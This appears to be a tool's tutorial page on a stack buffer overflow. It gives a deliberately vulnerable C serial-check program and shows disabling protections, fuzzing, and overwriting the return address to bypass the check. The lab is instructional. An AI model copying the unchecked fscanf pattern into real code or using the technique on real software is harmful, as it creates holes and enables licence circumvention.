Exploit development

#Exploit Development

##Exploit Development 1: Overwriting Instruction Pointer

• Vulnerable Serial-Key C program.

//Disable Canaries, Compile: gcc serial.c -fno-stack-protector -o serial
//Disable ASLR, echo 0 > /proc/sys/kernel/randomize_va_space

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int valid_serial(char *psz){
	size_t len = strlen(psz);
	unsigned total = 0;
	size_t i;
	if (len < 10)
		return 0;
	for(i = 0; i < len ; i++){
		if ((psz[i] < '0') || (psz[i] > 'z' ))
			return 0;

		total += psz[i];
	}
	if (total % 853 == 83)
		return 1;
	return 0;
}

int validate_serial(){
	char serial[24];
	fscanf(stdin, "%s", serial);
	if (valid_serial(serial))
		return 1;
	else
		return 0;
}

int do_valid_stuff(){
	printf("The serial number is valid!\n");
	// do serial-restricted, valid stuff here.
	exit(0);
}

int do_invalid_stuff(){
	printf("Invalid serial number!\nExiting\n");
	exit(1);
}

int main(int argc, char *argv[] ){
	if(validate_serial())
		do_valid_stuff();
	else
		do_invalid_stuff();
	return 0;
}

• commands:

 pythem> gcc serial.c -fno-stack-protector -o serial
 
 pythem> ./serial
 123456
 Invalid serial number!
 Exiting

 pythem> gdb ./serial

 (gdb) disas main
 Dump of assembler code for function main:
              ...
 callq  0x400723 <do_valid_stuff>
              ...
 
 (gdb) quit
 
 pythem> set file ./serial
 
 pythem> fuzz stdin
              ...
 [*] Sending buffer with lenght: 39
              ...
 [*] Child program exited with code 1

 [*] Hit enter to continue.

 [*] Sending buffer with lenght: 40

 [*] Sending buffer with lenght: 41


 [*] Child program crashed with SIGSEGV
 ^C
 
 pythem> xploit stdin
 
 xploit> set arch x64
 
 xploit> set offset
 [+] Enter the offset (number of 'A's): 40
 xploit> set addr1
 [+] First address to overwrite: 0x400723
 
 xploit> xploit
 [+] Writing payload into buffer.txt

 [*] Sending buffer with lenght: 58

 The serial number is valid!

 Exiting